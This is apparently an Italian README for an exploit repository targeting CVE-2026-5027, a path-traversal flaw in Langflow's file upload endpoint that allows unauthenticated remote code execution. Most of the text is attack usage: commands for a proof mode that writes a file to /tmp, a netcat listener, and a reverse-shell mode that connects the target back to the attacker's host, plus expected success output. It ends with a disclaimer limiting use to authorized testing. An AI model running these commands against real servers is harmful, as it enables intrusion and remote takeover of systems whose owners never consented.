
CVE-2026-5027
Scrittura Arbitraria di File verso RCE
Esecuzione Remota di Codice non Autenticata tramite Upload di File
Langflow presenta una vulnerabilità critica di path traversal nell'endpoint di upload file (POST /api/v2/files).
Un attaccante può inviare un nome di file malizioso contenente sequenze ../ per scrivere file arbitrari ovunque nel filesystem del server.
Questo porta facilmente a una piena esecuzione di codice remoto (RCE) — ad esempio inserendo una webshell o modificando il crontab.
/tmp)python3 CVE-2026-5027.py -t http://target:7860/ --proof
Output previsto se vulnerabile:
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt
# Avvia il listener
nc -lvnp 4444
# Esegui l'exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444
| File | Descrizione |
|---|---|
CVE-2026-5027.py | Exploit Python principale (PoC + RCE) |
CVE-2026-5027.yaml | Template Nuclei per la scansione |
README.md | Questo file |
Modalità Proof
python3 CVE-2026-5027.py -t http://target.com/ --proof
Modalità Reverse Shell
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444
Questo repository è destinato solo a scopo educativo e a test di sicurezza autorizzati.
Usalo in modo responsabile e solo su sistemi per cui hai esplicito permesso di test.
Realizzato con ❤️ per la community red team